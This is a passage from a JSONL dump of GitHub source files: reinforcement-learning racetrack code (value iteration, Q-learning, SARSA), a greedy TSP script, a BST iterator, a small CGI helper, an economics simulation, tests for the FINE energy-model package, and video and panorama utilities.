else:\n return -1\n\n # Takes a current state in the form of it's x and y corrdinate, current x velocity, and curernt y velocity.\n # It then applies an accelration action to the state and returns the new state.\n def calc_action_outcome(self, state_x, state_y, x_velocity, y_velocity, action_x_acc_delta, action_y_acc_delta):\n # The racecar only applies the acceleration change to it's current position and velocity and returns it's end\n # state. It knows nothing about the track structure.\n new_state = self.rc.apply_acc_change_get_state(\n state_x, state_y, x_velocity, y_velocity, action_x_acc_delta, action_y_acc_delta\n )\n # The rules of this model restrict that velocity in x and y dimension cannot be outside the range of -5 to +5.\n if new_state.x_velocity > 5 or new_state.x_velocity < -5 or new_state.y_velocity > 5 or new_state.y_velocity < -5:\n return None\n # Check path from old pos to new pos by asking the track if the car is allowed to travel from previous state\n # to new state\n final_x_pos, final_y_pos = self.rt.move_along_line(state_x, state_y, new_state.x_pos, new_state.y_pos)\n # If the track says the car ends at a position that is different from the new state, it has hit a wall.\n if new_state.x_pos != final_x_pos or new_state.y_pos != final_y_pos:\n # You've hit a wall...\n if self.crash_means_restart: # Crash means restart at start position\n #Crashing into the wall behind the goal is allowed\n if self.rt.track_matrix[final_y_pos][final_x_pos] == \"F\":\n return State(final_x_pos, final_y_pos, 0, 0)\n LOG.debug(\"CRASHED - going back to start\")\n return State(self.rc.start_x, self.rc.start_y, 0, 0)\n else: # Crash means go to last legal position\n LOG.debug(\"CRASHED - zeroing velocity\")\n return State(final_x_pos, final_y_pos, 0, 0)\n # There was no collision and new state is legal.\n return new_state\n\n # Calculate Qt(S, A)\n def calc_action_q(self, prev_t_v, state_x, state_y, x_velocity, y_velocity, action: Action):\n # Generate final state of sucessful action...\n succesful_action_result = self.calc_action_outcome(\n state_x, state_y, x_velocity, y_velocity, action.x_acc_delta, action.y_acc_delta\n )\n if succesful_action_result is None: # Action has no result as velocity exceeds limit\n return float('-inf')\n # Calculate sucessful action score contribtion which occurs 80% of the time\n sucessful_action_value = (0.80) * prev_t_v[succesful_action_result]\n # Unsucessful action will not apply any acceleration change\n unsuccesful_action_result = self.calc_action_outcome(\n state_x, state_y, x_velocity, y_velocity, 0, 0\n )\n # Calculate unsuccesful action score contribution which occurs 20% of the time..\n unsucessful_action_value = (0.20) * prev_t_v[unsuccesful_action_result]\n # Get desitnationr reward\n destination_reward = self.reward(succesful_action_result.x_pos, succesful_action_result.y_pos)\n # Return Qt(S, A)\n return destination_reward + (self.lr * (sucessful_action_value + unsucessful_action_value))\n\n # Used to perform the value iteration algorithm.\n def learn_policy(self):\n check_state = State(1, 6, 0, 0) # Used for debugging... It is the start state on the L track...\n for time_state in range(1, self.mi+1): # Do max_iterations number of passes over the state space\n LOG.info(f\"Computing state space iteration: {time_state}\")\n old_values = self.rc.v.copy() # Copy the current state of V for current set of calculations..\n for state in self.rt.legal_states(): # Iterate through all states the race car can take on the race track\n best_action, best_action_q = None, float('-inf') # Used to store the best action seen so far\n if state == check_state:\n LOG.debug(f\"Populating @ time {time_state}: {state} {self.rt.track_matrix[state.y_pos][state.x_pos]}\")\n # Iterate through all actions\n for action in self.rc.actions():\n # Calculate Qt(S, A)\n action_q_score = self.calc_action_q(\n old_values, state.x_pos, state.y_pos, state.x_velocity, state.y_velocity, action\n )\n if state == check_state:\n LOG.debug(f\"{action} has Qt(S, A) score {action_q_score}\")\n # Save the best one\n if action_q_score > best_action_q:\n best_action = action\n best_action_q = action_q_score\n # Save the best action and it's score as the acceleration policy and V value at current State\n self.rc.acceleration_policy[state] = best_action\n self.rc.v[state] = best_action_q\n if state == check_state:\n LOG.debug(f\"{state} V value updated to {best_action_q} from action {action}\")\n # Once the policy is learned - print the car's path through the track.\n race_durations = []\n\n for _ in range(NUM_RACES):\n race_durations.append(self.animate_car_policy()) # Animate car policy\n LOG.info(f\"Race times from {NUM_RACES} attempts: {race_durations}\")\n LOG.info(f\"Average race duration: {str(mean(race_durations))}\")\n\n # Used to animate the car moving through the track with the current policy..\n def animate_car_policy(self):\n max_allowed_steps = 400\n time_state = 1\n x_velocity, y_velocity = 0, 0\n x_pos, y_pos = self.rc.start_x, self.rc.start_y\n state = State(x_pos, y_pos, x_velocity, y_velocity) # Get start state\n track = copy.deepcopy(self.rt.track_matrix)\n while True:\n # Only allow 400 steps in an attempt to reach the finish line\n if time_state == max_allowed_steps or state is None:\n print(f\"Unable to reach finish line after {time_state} iterations\")\n return time_state\n os.system('cls' if os.name == 'nt' else 'clear') # Clear terminal for printing of track\n track[state.y_pos][state.x_pos] = str(time_state)[-1] # Update the track that a spot has been reached\n # for row in track: # Print track..\n # print(row)\n if self.rt.track_matrix[state.y_pos][state.x_pos] == \"F\": # You've reached the finish line\n print(f\"Reached finish line after {time_state} steps\")\n return time_state\n policy_state_action = self.rc.acceleration_policy[state] # Get best action from policy\n # Allow for 20% chance that action fails.\n non_deterministic_factor = random() \n if non_deterministic_factor <= 0.20:\n next_state = self.calc_action_outcome(\n state.x_pos, state.y_pos, state.x_velocity, state.y_velocity,\n 0, 0\n )\n print(f\"At time {time_state} \", \"from\", state, \"action policy failed [non-deterministic result] to state\", str(next_state))\n else: # Take action stored from policy...\n next_state = self.calc_action_outcome(\n state.x_pos, state.y_pos, state.x_velocity, state.y_velocity,\n policy_state_action.x_acc_delta, policy_state_action.y_acc_delta\n )\n print(f\"At time {time_state} \", \"from\", state, \"took\", self.rc.acceleration_policy[state], \"to state\", str(next_state))\n state = next_state\n time_state += 1\n return time_state\n\n# Class that extends ValueIteration implementation to utilize it's RaceCar/RaceTrack management but overwrites it's\n# learn_policy method to implement Q learning algorithm.\nclass QLearning(RaceTrackValueIteration):\n\n # Similar to value iteration with the addition of discount rate\n def __init__(self, race_track: RaceTrack, race_car: RaceCar, learning_rate: float, max_episodes: int,\n crash_means_restart: bool, discount_rate: float\n ):\n self.rt = race_track\n self.rc = race_car\n self.lr = learning_rate\n self.dr = discount_rate \n self.curr_episode = 0\n self.me = max_episodes\n self.epsilon = 0.95 # Baseline epsilon for epsilon greedy selection of next action\n self.crash_means_restart = crash_means_restart\n\n # This method take the Q(S, A) table/dictionary and populates the policy with the A that maximizes Q(S, A) for \n # each S.\n def populate_car_policy_from_q(self, q):\n for state in q.keys():\n self.rc.acceleration_policy[state] = max(q[state], key=q[state].get)\n\n # Calculates the update of Q(S, A) using score of taking action at previous state and taking the action\n # with highest score at next state.\n def calculate_q_update(self, q, prev_state, new_state, action):\n reward = -1 # This calculation only happens when not at finish line state so reward is a cost of -1\n action_score = q[prev_state][action]\n # Action at new state is chosen using the one with highest Q score at next state.\n next_state_action_max_score = max(q[new_state].values())\n LOG.debug(f\"Chose from next state {new_state} action with max score: {next_state_action_max_score}\")\n return ( action_score\n + (self.lr*(reward + self.dr*next_state_action_max_score - action_score))\n )\n\n # Epsilon greedy selection of action at current state..\n def pick_next_action(self, q, state):\n # Start with high value epsilon and gradually decrease it as more episodes occur...\n working_epsilon = (float(self.me - self.curr_episode) / self.me) * 0.95\n rand_float = random() # Returns random number between 0 and 1...\n # with epislon probability, choose a random action...\n if rand_float <= working_epsilon:\n action = np.random.choice(list(q[state]))\n else: # with 1-epsilon probability, choose the best action...\n action = max(q[state], key=q[state].get)\n return action\n\n # Initialize q table/dictionary with random values for each action at each legal state.\n def initialize_q(self):\n q = {}\n for state in self.rt.legal_states():\n q[state] = {}\n for action in self.rc.actions():\n q[state][action] = random()\n return q\n\n # Implementation of Q learning algorithm.\n def learn_policy(self):\n check_state = State(1, 6, 0, 0) # Used for debugging... It is the start state on the L track...\n # Initialize all Q(s, a) arbitrarily.\n q = self.initialize_q()\n self.curr_episode = 0 # updates whenever the race car leaves from the start...\n for episode_iteration in range(self.me): # Do maximum_iterations number of episodes.\n LOG.info(f\"Performing episode iteration: {episode_iteration} / {self.me}\")\n # Reset end state Q scores...\n for end_state in self.rt.end_states():\n q[end_state] = {}\n for action in self.rc.actions():\n q[end_state][action] = 0.0\n # Start from RaceCars start position.\n state = State(self.rc.start_x, self.rc.start_y, 0, 0)\n if state == check_state:\n value_string = \"\\n\".join([f\"{str(key)} - {str(value)}\" for key, value in q[state].items()])\n LOG.debug(\n f\"On {episode_iteration} episode {state} {self.rt.track_matrix[state.y_pos][state.x_pos]} has Q values...\\n {value_string}\")\n while True:\n LOG.debug(f\"At {state}\")\n if self.rt.track_matrix[state.y_pos][state.x_pos] == \"S\":\n self.curr_episode += 1\n\n # print(self.curr_episode)\n # tc = copy.deepcopy(self.rt.track_matrix)\n # tc[state.y_pos][state.x_pos] = \"X\"\n # for row in tc:\n # print(row)\n # os.system('cls' if os.name == 'nt' else 'clear')\n\n # Greedy policy to pick best action at state...\n next_action = self.pick_next_action(q, state)\n # Calculate the outcome of taking next_action at current state. calc_action_outcome will return None\n # If the action taken at current state breaks velocity outside of -5 to +5 range rule.\n new_state = self.calc_action_outcome(\n state.x_pos, state.y_pos, state.x_velocity, state.y_velocity,\n next_action.x_acc_delta, next_action.y_acc_delta\n )\n # Pick actions untill one with legal consequence is chosen.\n while new_state is None:\n q[state].pop(next_action) # next_action is illegal at current state so it should be removed\n next_action = self.pick_next_action(q, state)\n new_state = self.calc_action_outcome(\n state.x_pos, state.y_pos, state.x_velocity, state.y_velocity,\n next_action.x_acc_delta, next_action.y_acc_delta\n )\n LOG.debug(f\"Chose {next_action} to get to {new_state}\")\n # Update Q with results of action\n q_s_a_update = self.calculate_q_update(q, state, new_state, next_action)\n LOG.debug(f\"Updating Q(S, A) for {state}, {next_action}, to {q_s_a_update}\")\n q[state][next_action] = q_s_a_update\n # If the race car has reached the finish - stop current episode.\n if self.rt.track_matrix[new_state.y_pos][new_state.x_pos] == \"F\":\n break\n # Update state\n state = new_state\n os.system('cls' if os.name == 'nt' else 'clear')\n self.populate_car_policy_from_q(q) # Populate car policy from Q\n race_durations = []\n for _ in range(NUM_RACES):\n race_durations.append(self.animate_car_policy()) # Animate car policy\n LOG.info(f\"Race times from {NUM_RACES} attempts: {race_durations}\")\n LOG.info(f\"Average race duration: {str(mean(race_durations))}\")\n\n\n# Class that extends QLearning implementation to utilize it's RaceCar/RaceTrack management in addition to learning\n# protocol\nclass SARSA(QLearning):\n\n # The only difference between Q learning and SARSA is how the Q score update of Q(S, A) is calculated. \n # Here it uses the same protocol to chose the next action in the next state as it did to chose the current action\n # at the previous state. This is different from Q learning where the next action is chosen as the one with max Q\n # score at next state.\n def calculate_q_update(self, q, prev_state, new_state, action):\n reward = -1 # This calculation only happens when not at finish line state so reward is a cost of -1\n action_score = q[prev_state][action]\n next_state_action = self.pick_next_action(q, new_state) # Pick an action at the next state using epsilon greedy\n LOG.debug(f\"Chose from next state {new_state} {next_state_action} with using epsilon greedy choice\")\n return ( action_score\n + (self.lr*(reward + self.dr*q[new_state][next_state_action] - action_score))\n )\n","repo_name":"notmaurox/pyml","sub_path":"src/learning_algorithms/racetrack_value_iteration.py","file_name":"racetrack_value_iteration.py","file_ext":"py","file_size_in_byte":17259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7413743197","text":"#贪心法\r\nimport pandas as pd\r\nimport numpy as np\r\nimport math\r\nimport torch\r\nimport time\r\ndef getset(citynumber,samples):\r\n torch.manual_seed(66)\r\n data_set = []\r\n for l in range(samples):\r\n #生成在坐标在0 1 之间的\r\n x = torch.FloatTensor(2, citynumber*2).uniform_(0, 1)\r\n data_set.append(x)\r\n return data_set\r\ntrainset=getset(10,100)\r\ndata_set=[]\r\nfor i in range(100):\r\n data_set.append(np.array(trainset[i]))\r\n#print(data_set)\r\nprint(data_set[0][1])\r\ndist=np.zeros((10,10))\r\ntotal=0\r\nfor p in range(100):\r\n for i in range(10):\r\n for j in range(10):\r\n dist[i][j]=math.sqrt((data_set[p][1][i]-data_set[p][1][j])**2+(data_set[p][0][i]-data_set[p][0][j])**2)\r\n i=1\r\n n=10\r\n j=0\r\n sumpath=0\r\n s=[]\r\n s.append(0)\r\n start = time.clock()\r\n while True:\r\n k=1\r\n Detemp=10000000\r\n while True:\r\n l=0\r\n flag=0\r\n if k in s:\r\n flag = 1\r\n if (flag==0) and (dist[k][s[i-1]] < Detemp):\r\n j = k\r\n Detemp=dist[k][s[i - 1]]\r\n k+=1\r\n if k>=n:\r\n break\r\n s.append(j)\r\n i+=1\r\n sumpath+=Detemp\r\n if i>=n:\r\n break\r\n sumpath+=dist[0][j]\r\n end = time.clock()\r\n print(\"结果:\")\r\n total+=sumpath\r\n print(sumpath)\r\n for m in range(n):\r\n print(\"%s \"%(s[m]),end='')\r\nprint(total/100)","repo_name":"shercoo/TSP-Pointer_network","sub_path":"REINFORCEMENT/greedy.py","file_name":"greedy.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"24380476940","text":"import sys\nsys.path.append('../')\nfrom functions import gft_functions, virtual_valuation_functions\nimport csv\nimport time\nimport itertools\nimport random\nstarttime = time.time()\n\n\n# y is the size of the buyer/seller supports\ny = 100\n\n# x is the range of buyer/seller supports\nx = 20\n\n# Sets buyer/seller valuations\nbuyervaluation = list(range(1, y+1))\nsellervaluation = list(range(0, y))\n\nn = len(buyervaluation)\nm = len(sellervaluation)\n\n\n\n\n# Writes rows of sorted data list into csv file\nwith open('/Users/stevenma/PycharmProjects/gainsfromtradeupdated/data/buyer = '+str(len(buyervaluation))+', seller = '+str(len(sellervaluation))+', randomized with utility.csv', 'a') as csvfile:\n writer = csv.writer(csvfile)\n while True:\n buyer_virtual_valuation = [sellervaluation[random.randint(0,x)] for x in range(n)]\n buyer_virtual_valuation = sorted(buyer_virtual_valuation)\n buyer_density = virtual_valuation_functions.virtualvaluationbuyerinverse(buyervaluation, buyer_virtual_valuation, 1)\n\n seller_density = buyer_density[::-1]\n\n\n data = gft_functions.utility_computer(sellervaluation, seller_density, buyervaluation, buyer_density)\n\n if ((data[0] + data[1]) / data[2]<=.86):\n row = [data[0], data[1], data[2], (data[0]+data[1])/data[2], buyer_density, seller_density]\n print(\"hello\", (data[0]+data[1])/data[2])\n\n else:\n row = [data[0], data[1], data[2], (data[0] + data[1]) / data[2]]\n\n writer.writerow(row)\n\n\n\ncsvfile.close()\n\n","repo_name":"stevensiqima/223-code","sub_path":"uncorrelated/uncorrelated_random_density_utility_computer.py","file_name":"uncorrelated_random_density_utility_computer.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7833719450","text":"\"\"\"\nDefinition of TreeNode:\nclass TreeNode:\n def __init__(self, val):\n self.val = val\n self.left, self.right = None, None\n\nExample of iterate a tree:\niterator = BSTIterator(root)\nwhile iterator.hasNext():\n node = iterator.next()\n do something for node \n\"\"\"\n\n\n\n# 2018.1.1 Inorder Morris O(1)\nclass BSTIterator:\n \"\"\"\n @param: root: The root of binary tree.\n \"\"\"\n def __init__(self, root):\n # do intialization if necessary\n self.cur = root\n\n \"\"\"\n @return: True if there has next node, or false\n \"\"\"\n def hasNext(self):\n # write your code here\n return True if self.cur else False\n\n \"\"\"\n @return: return next node\n \"\"\"\n def next(self):\n # write your code here\n res = None\n cur = self.cur\n while cur:\n if not cur.left:\n res = cur\n cur = cur.right\n break\n else:\n pre = cur.left\n while pre.right and pre.right != cur:\n pre = pre.right\n if pre.right != cur:\n pre.right = cur\n cur = cur.left\n else:\n res = cur\n pre.right = None\n cur = cur.right\n break\n self.cur = cur\n return res\n\n","repo_name":"yihanc/LC","sub_path":"LINTCODE/86_binary_search_tree_iterator.py","file_name":"86_binary_search_tree_iterator.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13549912799","text":"import sys\nimport os\n\n\ndef fgrep(file, wrd):\n\tval=[line for line in file if line.startswith(wrd)]\t\t\t\n\treturn val\n\n\ndef exe_cgi(content):\n\tstream = os.popen(content)\n\treturn stream.read()\n\ndef cgi_handler(server_res, content):\n\top = exe_cgi(content).splitlines()\n\tserver_res=server_res.splitlines()\n\tl_op=fgrep(op, \"Location:\" )\n\tif l_op:\n\t\tserver_res[0]=\"HTTP/1.1 302 Found\"\n\t\tserver_res.app\n\n\n","repo_name":"kritikagarg/HTTP-Webserver-implementation","sub_path":"cgi_file.py","file_name":"cgi_file.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"562657427","text":"import pytest\n\nimport FINE as fn\n\n\ndef test_export_to_dict_minimal(minimal_test_esM):\n # EXPECTED\n expected_esm_dict = dict(\n zip(\n (\n \"locations\",\n \"commodities\",\n \"stochasticModel\",\n \"commodityUnitsDict\",\n \"numberOfTimeSteps\",\n \"hoursPerTimeStep\",\n \"startYear\",\n \"numberOfInvestmentPeriods\",\n \"investmentPeriodInterval\",\n \"costUnit\",\n \"lengthUnit\",\n \"verboseLogLevel\",\n \"balanceLimit\",\n \"pathwayBalanceLimit\",\n \"annuityPerpetuity\",\n ),\n (\n minimal_test_esM.locations,\n minimal_test_esM.commodities,\n minimal_test_esM.stochasticModel,\n minimal_test_esM.commodityUnitsDict,\n minimal_test_esM.numberOfTimeSteps,\n minimal_test_esM.hoursPerTimeStep,\n minimal_test_esM.startYear,\n minimal_test_esM.numberOfInvestmentPeriods,\n minimal_test_esM.investmentPeriodInterval,\n minimal_test_esM.costUnit,\n minimal_test_esM.lengthUnit,\n minimal_test_esM.verboseLogLevel,\n minimal_test_esM.balanceLimit,\n minimal_test_esM.pathwayBalanceLimit,\n minimal_test_esM.annuityPerpetuity,\n ),\n )\n )\n\n expected_Electrolyzers_investPerCapacity = minimal_test_esM.getComponentAttribute(\n \"Electrolyzers\", \"investPerCapacity\"\n )\n expected_Electricitymarket_operationRateMax = (\n minimal_test_esM.getComponentAttribute(\"Electricity market\", \"operationRateMax\")\n )\n expected_Industrysite_operationRateFix = minimal_test_esM.getComponentAttribute(\n \"Industry site\", \"operationRateFix\"\n )\n\n # FUNCTION CALL\n output_esm_dict, output_comp_dict = fn.dictIO.exportToDict(minimal_test_esM)\n\n output_Conversion_investPerCapacity = (\n output_comp_dict.get(\"Conversion\").get(\"Electrolyzers\").get(\"investPerCapacity\")\n )\n output_Source_operationRateMax = (\n output_comp_dict.get(\"Source\").get(\"Electricity market\").get(\"operationRateMax\")\n )\n output_Sink_operationRateFix = (\n output_comp_dict.get(\"Sink\").get(\"Industry site\").get(\"operationRateFix\")\n )\n\n # ASSERTION\n assert output_esm_dict == expected_esm_dict\n assert (\n expected_Electrolyzers_investPerCapacity == output_Conversion_investPerCapacity\n )\n assert expected_Electricitymarket_operationRateMax.equals(\n output_Source_operationRateMax\n )\n assert expected_Industrysite_operationRateFix.equals(output_Sink_operationRateFix)\n\n\ndef test_export_to_dict_singlenode(single_node_test_esM):\n # EXPECTED\n expected_esm_dict = dict(\n zip(\n (\n \"locations\",\n \"commodities\",\n \"stochasticModel\",\n \"commodityUnitsDict\",\n \"numberOfTimeSteps\",\n \"hoursPerTimeStep\",\n \"startYear\",\n \"numberOfInvestmentPeriods\",\n \"investmentPeriodInterval\",\n \"costUnit\",\n \"lengthUnit\",\n \"verboseLogLevel\",\n \"balanceLimit\",\n \"pathwayBalanceLimit\",\n \"annuityPerpetuity\",\n ),\n (\n single_node_test_esM.locations,\n single_node_test_esM.commodities,\n single_node_test_esM.stochasticModel,\n single_node_test_esM.commodityUnitsDict,\n single_node_test_esM.numberOfTimeSteps,\n single_node_test_esM.hoursPerTimeStep,\n single_node_test_esM.startYear,\n single_node_test_esM.numberOfInvestmentPeriods,\n single_node_test_esM.investmentPeriodInterval,\n single_node_test_esM.costUnit,\n single_node_test_esM.lengthUnit,\n single_node_test_esM.verboseLogLevel,\n single_node_test_esM.balanceLimit,\n single_node_test_esM.pathwayBalanceLimit,\n single_node_test_esM.annuityPerpetuity,\n ),\n )\n )\n\n expected_Electrolyzers_investPerCapacity = (\n single_node_test_esM.getComponentAttribute(\"Electrolyzers\", \"investPerCapacity\")\n )\n expected_Electricitymarket_operationRateMax = (\n single_node_test_esM.getComponentAttribute(\n \"Electricity market\", \"operationRateMax\"\n )\n )\n expected_Industrysite_operationRateFix = single_node_test_esM.getComponentAttribute(\n \"Industry site\", \"operationRateFix\"\n )\n\n # FUNCTION CALL\n output_esm_dict, output_comp_dict = fn.dictIO.exportToDict(single_node_test_esM)\n\n output_Conversion_investPerCapacity = (\n output_comp_dict.get(\"Conversion\").get(\"Electrolyzers\").get(\"investPerCapacity\")\n )\n output_Source_operationRateMax = (\n output_comp_dict.get(\"Source\").get(\"Electricity market\").get(\"operationRateMax\")\n )\n output_Sink_operationRateFix = (\n output_comp_dict.get(\"Sink\").get(\"Industry site\").get(\"operationRateFix\")\n )\n\n # ASSERTION\n assert output_esm_dict == expected_esm_dict\n assert (\n expected_Electrolyzers_investPerCapacity == output_Conversion_investPerCapacity\n )\n assert expected_Electricitymarket_operationRateMax.equals(\n output_Source_operationRateMax\n )\n assert expected_Industrysite_operationRateFix.equals(output_Sink_operationRateFix)\n\n\ndef test_export_to_dict_multinode(multi_node_test_esM_init):\n # EXPECTED\n expected_esm_dict = dict(\n zip(\n (\n \"locations\",\n \"commodities\",\n \"stochasticModel\",\n \"commodityUnitsDict\",\n \"numberOfTimeSteps\",\n \"hoursPerTimeStep\",\n \"numberOfInvestmentPeriods\",\n \"investmentPeriodInterval\",\n \"startYear\",\n \"costUnit\",\n \"lengthUnit\",\n \"verboseLogLevel\",\n \"balanceLimit\",\n \"pathwayBalanceLimit\",\n \"annuityPerpetuity\",\n ),\n (\n multi_node_test_esM_init.locations,\n multi_node_test_esM_init.commodities,\n multi_node_test_esM_init.stochasticModel,\n multi_node_test_esM_init.commodityUnitsDict,\n multi_node_test_esM_init.numberOfTimeSteps,\n multi_node_test_esM_init.hoursPerTimeStep,\n multi_node_test_esM_init.numberOfInvestmentPeriods,\n multi_node_test_esM_init.investmentPeriodInterval,\n multi_node_test_esM_init.startYear,\n multi_node_test_esM_init.costUnit,\n multi_node_test_esM_init.lengthUnit,\n multi_node_test_esM_init.verboseLogLevel,\n multi_node_test_esM_init.balanceLimit,\n multi_node_test_esM_init.pathwayBalanceLimit,\n multi_node_test_esM_init.annuityPerpetuity,\n ),\n )\n )\n\n expected_Windonshore_operationRateMax = (\n multi_node_test_esM_init.getComponentAttribute(\n \"Wind (onshore)\", \"operationRateMax\"\n )\n )\n expected_CCGTplantsmethane_investPerCapacity = (\n multi_node_test_esM_init.getComponentAttribute(\n \"CCGT plants (methane)\", \"investPerCapacity\"\n )\n )\n expected_Saltcavernshydrogen_capacityMax = (\n multi_node_test_esM_init.getComponentAttribute(\n \"Salt caverns (hydrogen)\", \"capacityMax\"\n )\n )\n expected_ACcables_reactances = multi_node_test_esM_init.getComponentAttribute(\n \"AC cables\", \"reactances\"\n )\n expected_Hydrogendemand_operationRateFix = (\n multi_node_test_esM_init.getComponentAttribute(\n \"Hydrogen demand\", \"operationRateFix\"\n )\n )\n\n # FUNCTION CALL\n output_esm_dict, output_comp_dict = fn.dictIO.exportToDict(multi_node_test_esM_init)\n\n output_Windonshore_operationRateMax = (\n output_comp_dict.get(\"Source\").get(\"Wind (onshore)\").get(\"operationRateMax\")\n )\n output_CCGTplantsmethane_investPerCapacity = (\n output_comp_dict.get(\"Conversion\")\n .get(\"CCGT plants (methane)\")\n .get(\"investPerCapacity\")\n )\n output_Saltcavernshydrogen_capacityMax = (\n output_comp_dict.get(\"Storage\")\n .get(\"Salt caverns (hydrogen)\")\n .get(\"capacityMax\")\n )\n output_ACcables_reactances = (\n output_comp_dict.get(\"LinearOptimalPowerFlow\")\n .get(\"AC cables\")\n .get(\"reactances\")\n )\n output_Hydrogendemand_operationRateFix = (\n output_comp_dict.get(\"Sink\").get(\"Hydrogen demand\").get(\"operationRateFix\")\n )\n\n # ASSERTION\n assert output_esm_dict == expected_esm_dict\n assert expected_Windonshore_operationRateMax.equals(\n output_Windonshore_operationRateMax\n )\n assert (\n expected_CCGTplantsmethane_investPerCapacity\n == output_CCGTplantsmethane_investPerCapacity\n )\n assert expected_Saltcavernshydrogen_capacityMax.equals(\n output_Saltcavernshydrogen_capacityMax\n )\n assert expected_ACcables_reactances.equals(output_ACcables_reactances)\n assert expected_Hydrogendemand_operationRateFix.equals(\n output_Hydrogendemand_operationRateFix\n )\n\n\n@pytest.mark.parametrize(\n \"test_esM_fixture\", [\"minimal_test_esM\", \"multi_node_test_esM_init\"]\n)\ndef test_import_from_dict(test_esM_fixture, request):\n test_esM = request.getfixturevalue(test_esM_fixture)\n\n # FUNCTION CALL\n ## get dicts\n esm_dict, comp_dict = fn.dictIO.exportToDict(test_esM)\n ## call the function on dicts\n output_esM = fn.dictIO.importFromDict(esm_dict, comp_dict)\n\n # EXPECTED (AND OUTPUT)\n expected_locations = test_esM.locations\n expected_commodityUnitsDict = test_esM.commodityUnitsDict\n\n if test_esM_fixture == \"minimal_test_esM\":\n ## expected\n expected_df = test_esM.getComponentAttribute(\n \"Electricity market\", \"operationRateMax\"\n )\n expected_series = None\n expected_value = test_esM.getComponentAttribute(\n \"Electrolyzers\", \"investPerCapacity\"\n )\n ## output\n output_df = output_esM.getComponentAttribute(\n \"Electricity market\", \"operationRateMax\"\n )\n output_df.reset_index(level=0, drop=True, inplace=True)\n\n output_value = output_esM.getComponentAttribute(\n \"Electrolyzers\", \"investPerCapacity\"\n )\n output_series = None\n\n else:\n ## expected\n expected_df = test_esM.getComponentAttribute(\n \"Hydrogen demand\", \"operationRateFix\"\n )\n expected_series = test_esM.getComponentAttribute(\n \"AC cables\", \"reactances\"\n ).sort_index()\n expected_value = test_esM.getComponentAttribute(\n \"Existing run-of-river plants\", \"investPerCapacity\"\n )\n ## output\n output_df = output_esM.getComponentAttribute(\n \"Hydrogen demand\", \"operationRateFix\"\n )\n output_df.reset_index(level=0, drop=True, inplace=True)\n\n output_series = output_esM.getComponentAttribute(\n \"AC cables\", \"reactances\"\n ).sort_index()\n output_value = output_esM.getComponentAttribute(\n \"Existing run-of-river plants\", \"investPerCapacity\"\n )\n assert output_series.equals(expected_series)\n\n # ASSERTION\n assert output_esM.locations == expected_locations\n assert output_esM.commodityUnitsDict == expected_commodityUnitsDict\n\n assert output_df.equals(expected_df)\n assert output_value == expected_value\n","repo_name":"FZJ-IEK3-VSA/FINE","sub_path":"test/IOManagement/test_dictIO.py","file_name":"test_dictIO.py","file_ext":"py","file_size_in_byte":11852,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"37"} +{"seq_id":"19982426571","text":"from Code.GUI_helper import *\nimport matplotlib.pyplot as plt\n\n\n# This file contains useful functions for using the programs and visualizing the results, such as breaking a new input\n# sequence into frames, creating a new video from the resulting frames and creating multiple panoramas.\n\n\ndef video2frames(file_name):\n \"\"\"\n This function reads the given video and breaks it down into frames. Moreover, this function produces a 10x naive\n fast-forward video, by sampling every 10th frames uniformly\n :param file_name: The name of the video that should be produced.\n \"\"\"\n # Create a VideoCapture object and read from input file\n cap = cv2.VideoCapture('../Videos/' + file_name + '.mp4')\n os.system('mkdir ../Data/' + file_name)\n\n # Check if camera opened successfully\n if (cap.isOpened() == False):\n print(\"Error opening video stream or file\")\n\n # Read until video is completed\n i = 1\n while (cap.isOpened()):\n # Capture frame-by-frame\n ret, frame = cap.read()\n if ret:\n # Display the resulting frame\n cv2.imshow('Frame', frame)\n cv2.imwrite('../Data/' + file_name + '/' + file_name + str(i) + '.jpg', frame)\n\n # Press Q on keyboard to exit\n if cv2.waitKey(10) & 0xFF == ord('q'):\n break\n else:\n break\n i += 1\n\n cap.release()\n # Closes all the frames\n cv2.destroyAllWindows()\n\n\ndef frames2video(dir):\n \"\"\"\n Creates a new output video from the frames in the specified dir.\n \"\"\"\n frames = load_images(dir)\n im_shape = frames[-1].shape\n out = cv2.VideoWriter('../Results/train-in-snow-reversed.avi', cv2.VideoWriter_fourcc('M', 'J', 'P', 'G'), 30,\n (im_shape[1], im_shape[0]))\n\n for frame in frames:\n out.write(frame)\n\n out.release()\n\n\ndef reverse_video(dir):\n \"\"\"\n Creates a new folder named '-reversed' and saves in it all the images in the sequence, in reversed order.\n \"\"\"\n sequence = dir.split('/')[-1]\n os.system(f'mkdir ../Data/{sequence}-reversed')\n images_path = sorted_alphanumeric(os.listdir(dir))\n i = len(images_path)\n for im_path in images_path:\n if im_path == '.DS_Store':\n continue\n im = BGR2RGB(cv2.imread(dir + '/' + im_path))\n plt.imsave(f'../Data/{sequence}-reversed/reversed-{i}.jpg', im)\n i -= 1\n\n\ndef create_panorama_small_start(start_frame, end_frame, start_column, end_column, frames, homographies):\n \"\"\"\n Creates a new panorama image in the case where the starting column is smaller than the ending column\n :param start_frame: the first frame to use for the panorama\n :param end_frame: the last frame to use for the panorama\n :param start_column: the first column to use in the panorama\n :param end_column: the last column to use in the panorama\n :param frames: the loaded frames that should be used for creating the panorama\n :param homographies: the homographies between every consecutive frames in the sequence\n :return: the new panorama image\n \"\"\"\n im_shape = frames[0].shape\n if start_frame == end_frame:\n return frames[start_frame][:, start_column:end_column, :]\n col_range = end_column - start_column\n total_motion = int(np.sum(np.round(homographies[0, 2, start_frame:end_frame])))\n first_motion = int(round(homographies[0, 2, start_frame]))\n num_frames = end_frame - start_frame + 1\n start_pos = calculate_added_motion(start_column + first_motion, end_column, num_frames)\n panorama_width = total_motion + col_range\n panorama_im = np.zeros((im_shape[0], panorama_width, im_shape[2])).astype(np.uint8)\n panorama_col = 0\n\n if start_column == end_column:\n for i in range(num_frames - 1):\n print(i)\n motion = int(round(homographies[0, 2, start_frame + i]))\n if start_column + motion < im_shape[1]:\n 